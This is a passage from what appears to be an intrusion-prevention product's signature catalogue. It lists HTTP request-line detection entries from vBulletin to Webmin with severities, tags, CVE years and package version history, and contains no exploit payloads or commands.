Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-503-5211
Vulnerability: HTTP-VBulletin-Forum-Calendar-SQL-Injection
Description:
Back to top

HTTP_CRL-VBulletin-Impex-Systempath-Code-Execution

About this situation: Detects vBulletin ImpEx systempath code execution exploits
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-503-5211
Vulnerability: HTTP-VBulletin-Impex-Systempath-Code-Execution
Description:
Back to top

HTTP_CRL-VBulletin-nodeid-SQL-Injection

About this situation: An attempt to exploit a VBulletin nodeid SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: VBulletin-nodeid-SQL-Injection
Description:
Back to top

HTTP_CRL-VBulletin-nodeid-SQL-Injection-CVE-2020-12720

About this situation: An attempt to exploit a vulnerability in VBulletin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: VBulletin-nodeid-SQL-Injection-CVE-2020-12720
Description:
Back to top

HTTP_CRL-VBulletin-Remote-Code-Execution-5.6.x

About this situation: An attempt to exploit a vulnerability in vBulletin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, vBulletin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: VBulletin-Remote-Code-Execution-5.6.x
Description:
Back to top

HTTP_CRL-VBulletin-widgetConfig-RCE

About this situation: An attempt to exploit a vulnerability in vBulletin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Any Hardware, vBulletin, CVE2019, Windows not specific, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: VBulletin-widgetConfig-RCE
Description:
Back to top

HTTP_CRL-Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005

About this situation: An attempt to exploit a vulnerability in vCenter Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005
Description:
Back to top

HTTP_CRL-Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985

About this situation: An attempt to exploit a vulnerability in vCenter Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985
Description:
Back to top

HTTP_CRL-Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Veeam Backup Enterprise Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam Backup and Replication, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Veeam ONE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam ONE, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Veeam ONE detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Veeam ONE, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1286-5242
Last changed: sgpkg-ips-1286-5242
Vulnerability: Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Veertu-Anka-Build-Service-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Veertu Anka Build detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Veertu Anka Build, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Vulnerability: Veertu-Anka-Build-Service-Directory-Traversal
Description:
Back to top

HTTP_CRL-Vegadns-Axfr_Get-Command-Injection

About this situation: An attempt to exploit a vulnerability in VegaDNS VegaDNS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VegaDNS, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-841-5242
Vulnerability: Vegadns-Axfr_Get-Command-Injection
Description:
Back to top

HTTP_CRL-Verity-Ultraseek-Search-Path-Disclosure

About this situation: Verity Ultraseek path disclosure
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Verity Ultraseek, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1607-5242
Vulnerability: HTTP-Verity-Ultraseek-Search-Path-Disclosure
Description:
Back to top

HTTP_CRL-VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957

About this situation: An attempt to exploit a vulnerability in VHD PTZ camera firmware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VHD PTZ, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957
Description:
Back to top

HTTP_CRL-VICIDIAL-Authenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in VICIdial detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, VICIDIAL, CVE2024, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: VICIDIAL-Authenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Vulnerability: VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability
Description:
Back to top

HTTP_CRL-Vinchin-Backup-And-Recovery-Command-Injection

About this situation: An attempt to exploit a vulnerability in Vinchin Backup & Recovery detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Vinchin Backup And Recovery, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Vinchin-Backup-And-Recovery-Command-Injection
Description:
Back to top

HTTP_CRL-Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Visual Mining NetCharts Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Visual Mining NetCharts Server, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Visual Mining NetCharts Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Visual Mining NetCharts Server, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal
Description:
Back to top

HTTP_CRL-VitalSuite-System-Compromise

About this situation: VsSetCookie.exe accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows NT, Windows 2000, Any Hardware, Lucent VitalSuite, CVE2002, Windows NT not specific, Windows 2000 not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-503-5211
Vulnerability: HTTP-VitalSuite-System-Compromise
Description:
Back to top

HTTP_CRL-VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887

About this situation: An attempt to exploit a vulnerability in VMware Aria Operations for Networks detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Aria Operations for Networks, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1602-5242
Vulnerability: VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887
Description: CVE References: CVE-2023-20887
Back to top

HTTP_CRL-VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in VMWare Aria Operations for Networks detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Aria Operations for Networks, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1699-5242
Vulnerability: VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-VMware-HCX-Listextensions-SQL-Injection

About this situation: An attempt to exploit a vulnerability in VMWare HCX
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMWare HCX, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: VMware-HCX-Listextensions-SQL-Injection
Description:
Back to top

HTTP_CRL-VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution

About this situation: A vulnerability in VMware Hyperic HQ detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Hyperic HQ, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution
Description:
Back to top

HTTP_CRL-VMware-Multiple-Products-Configurator-Command-Injection

About this situation: An attempt to exploit a vulnerability in VMWare Identity Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VMware Identity Manager, VMware Identity Manager Connector, VMware WorkStation One Access, VMware WorkStation One Access Connector, VMware Cloud Foundation, VMware vRealize Suite Lifecycle Manager, CVE2020, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: VMware-Multiple-Products-Configurator-Command-Injection
Description:
Back to top

HTTP_CRL-VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961

About this situation: An attempt to exploit a vulnerability in VMware SD-WAN Edge detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware SD-WAN Edge, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1659-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961
Description:
Back to top

HTTP_CRL-VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in VMWare Spring Cloud Data Flow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMWare Spring Cloud Data Flow, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Vulnerability: VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal
Description:
Back to top

HTTP_CRL-VMware-Spring-Cloud-Gateway-Spel-Code-Injection

About this situation: An attempt to exploit a vulnerability in VMWare Spring Cloud Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMWare Spring Cloud Gateway, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Vulnerability: VMware-Spring-Cloud-Gateway-Spel-Code-Injection
Description:
Back to top

HTTP_CRL-VMware-User-Credential-Verification-Request-To-Authentication-Server

About this situation: A VMware Identity Manager user credential verification request to an authentication server
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, VMware Identity Manager, VMware Workspace ONE, CVE2022, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1472-5242
Last changed: sgpkg-ips-1472-5242
Vulnerability: VMware-User-Credential-Verification-Request-To-Authentication-Server
Description:
Back to top

HTTP_CRL-VMware-Vcenter-Server-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in VMware vCenter Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vCenter Server, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1461-5242
Vulnerability: VMware-Vcenter-Server-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-VMware-View-Planner-Logupload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in VMWare View Planner detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMWare View Planner, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: VMware-View-Planner-Logupload-Directory-Traversal
Description:
Back to top

HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in VMWare Cloud Foundation detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vRealize Suite Lifecycle Manager, VMWare vRealize Operations Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal
Description:
Back to top

HTTP_CRL-VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in VMWare Cloud Foundation detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vRealize Suite Lifecycle Manager, VMWare vRealize Operations Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Vulnerability: VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery
Description:
Back to top

HTTP_CRL-VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain

About this situation: An attempt to exploit a vulnerability in VMware Workspace ONE detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, VMware Workspace ONE, CVE2022, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Vulnerability: VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain
Description:
Back to top

HTTP_CRL-VMware-Workspace-One-Template-Injection-CVE-2022-22954

About this situation: An attempt to exploit a vulnerability in VMware Workspace ONE detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, VMware Workspace ONE, CVE2022, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: VMware-Workspace-One-Template-Injection-CVE-2022-22954
Description:
Back to top

HTTP_CRL-Voipmonitor-SQL-Injection-CVE-2022-24260

About this situation: An attempt to exploit a vulnerability in VoIPmonitor detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VoIPmonitor, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Voipmonitor-SQL-Injection-CVE-2022-24260
Description:
Back to top

HTTP_CRL-Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection
Description:
Back to top

HTTP_CRL-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Voltronic Power ViewPower Pro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Voltronic Power ViewPower Pro, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Description:
Back to top

HTTP_CRL-W3who-DLL-Long-Query-BOF

About this situation: Vulnerable w3who.dll access detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows XP, Windows 2000, Any Hardware, Microsoft Windows Resource Kit, CVE2004, Windows XP not specific, Windows 2000 not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1405-5242
Vulnerability: HTTP-W3who-DLL-Long-Query-BOF
Description:
Back to top

HTTP_CRL-Waledac-Spambot

About this situation: Waledac spambot command and control channel communication detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Waledac spambot, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: Waledac-Spambot
Description:
Back to top

HTTP_CRL-WAMP-Webmail-No-Url-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerability in WAMP Webmail
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, WAMP Webmail, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: WAMP-Webmail-No-Url-File-Inclusion
Description:
Back to top

HTTP_CRL-Watchguard-Pre-Auth-RCE-CVE-2022-26318

About this situation: An attempt to exploit a vulnerability in Watchguard
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Watchguard, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Watchguard-Pre-Auth-RCE-CVE-2022-26318
Description:
Back to top

HTTP_CRL-Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wavelink Emulation License Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wavelink Emulation License Server, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016

About this situation: An attempt to exploit a vulnerability in Wazuh
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wazuh, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016
Description:
Back to top

HTTP_CRL-Wazuh-Wazuh-Host-Deny-Command-Injection

About this situation: An attempt to exploit a vulnerability in Wazuh Wazuh detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wazuh, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Wazuh-Wazuh-Host-Deny-Command-Injection
Description:
Back to top

HTTP_CRL-WD-My-Cloud-NAS-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in WD My Cloud NAS detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, WD My Cloud NAS, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: WD-My-Cloud-NAS-Command-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Web-Dorado-Ecommerce-WD-SQL-Injection

About this situation: An attempt to exploit a Web-Dorado ECommerce WD SQL Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Web-Dorado ECommerce WD, CVE2015, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: Web-Dorado-Ecommerce-WD-SQL-Injection
Description:
Back to top

HTTP_CRL-Web-Server-PHP-Injection

About this situation: An attempt to exploit a PHP injection vulnerability in web server services detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Web-Server-PHP-Injection
Description:
Back to top

HTTP_CRL-WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution

About this situation: An attempt to exploit a vulnerability in WebBBS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebBBS, CVE2002, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution
Description:
Back to top

HTTP_CRL-WebCake-2-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Adware.WebCake-Botnet
Description:
Back to top

HTTP_CRL-Webgais-Cgi-System-Compromise

About this situation: Vulnerable webgais script and shell metacharacters detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebGAIS, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1607-5242
Vulnerability: HTTP-Webgais-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-Webmin-And-Usermin-Format-String-Vulnerability

About this situation: Detects Webmin and Usermin Format String exploits
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Webmin, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Generic-Webmin-And-Usermin-Format-String-Vulnerability
Description:
Back to top

HTTP_CRL-Webmin-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in Webmin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Webmin, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: Webmin-Command-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Webmin-Cross-Site-Scripting-CVE-2018-19191

About this situation: An attempt to exploit a vulnerability in Webmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Webmin-Cross-Site-Scripting-CVE-2018-19191
Description:
Back to top

HTTP_CRL-Webmin-File-Manager-RCE

About this situation: An attempt to exploit a vulnerability in Webmin detected.
